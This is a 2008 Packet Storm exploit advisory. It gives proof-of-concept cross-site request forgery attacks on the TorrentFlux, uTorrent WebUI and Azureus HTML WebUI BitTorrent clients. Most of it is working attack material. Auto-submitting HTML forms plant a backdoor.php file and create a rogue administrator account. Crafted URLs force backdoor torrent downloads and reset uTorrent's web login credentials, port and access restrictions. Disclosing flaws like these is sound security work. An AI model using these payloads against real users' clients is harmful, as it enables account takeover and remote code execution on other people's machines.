torrent-pwnage.txt

2008-04-18T00:00:00
ID PACKETSTORM:65654
Type packetstorm
Reporter Michael Brooks
Modified 2008-04-18T00:00:00

Description

                                        
                                            `The following are proof of concept exploits against three bittorrent clients. uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.  
  
More information:  
http://www.rooksecurity.com/blog/?p=10  
  
TorrentFlux v2.3(Latest)  
http://sourceforge.net/projects/torrentflux/  
  
If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:  
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/  
You do not have to know a password to access this folder, but you will have to know the username.  
<html>  
<form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php">  
<input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent">  
<input type=submit value='file attack'>  
</from>  
<html>  
<script>  
document.getElementById('file_attack').submit();  
</script>  
  
<html>  
Add an admistrative account:  
<form id=’create_admin’ method=”post” action=”http://localhost/torrentflux_2.3/html/admin.php?op=addUser”>  
<input type=hidden name=”newUser” value=”sadmin”>  
<input type=hidden name=”pass1″ value=”password”>  
<input type=hidden name=”pass2″ value=”password”>  
<input type=hidden name=”userType” value=1>  
<input type=submit value=’create admin’>  
</form>  
</html>  
<script>  
document.getElementById(’create_admin’).submit();  
</script>  
  
uTorrent’s WebUI is also affected:  
http://forum.utorrent.com/viewtopic.php?id=14565  
force file download:  
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent  
  
utorrent change administrative login information:  
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin  
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin  
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096  
After the username or password have been changed then the browser must re-authenticate.  
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1  
So is Azurues’s HTML WebUI:  
Force file download:  
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent  
`